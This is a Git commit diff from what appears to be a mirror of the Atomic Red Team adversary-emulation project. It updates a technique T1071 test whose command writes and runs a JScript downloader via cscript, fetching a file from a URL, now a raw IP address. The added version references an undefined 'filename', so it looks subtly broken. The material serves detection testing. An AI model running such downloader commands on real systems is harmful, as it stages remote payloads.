security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-03-04 21:35:00 +00:00
parent 75149a7ac0
commit f89552e246
2 changed files with 7 additions and 11 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1071/T1071.md
+2 -4
View File
@@ -242,20 +242,18 @@ Uses cscript //E:jscript to download a file
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js|
| file_url | URL to retrieve file from | Url | https://www.w3.org/TR/PNG/iso_8859-1.txt|
| out_file | File to download payload to | Path | T1071-Out.txt|
| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
#### Attack Commands: Run with `command_prompt`!
```
echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
```
#### Cleanup Commands:
```
del #{script_file} /F /Q
del #{out_file} /F /Q
```
atomics/index.yaml
+5 -7
View File
@@ -27961,18 +27961,16 @@ command-and-control:
file_url:
description: URL to retrieve file from
type: Url
default: https://www.w3.org/TR/PNG/iso_8859-1.txt
out_file:
description: File to download payload to
type: Path
default: T1071-Out.txt
default: https://128.30.52.100/TR/PNG/iso_8859-1.txt
executor:
name: command_prompt
elevation_required: false
command: |
echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
cleanup_command: "del #{script_file} /F /Q\ndel #{out_file} /F /Q "
cleanup_command: 'del #{script_file} /F /Q
'
T1032:
technique:
x_mitre_data_sources: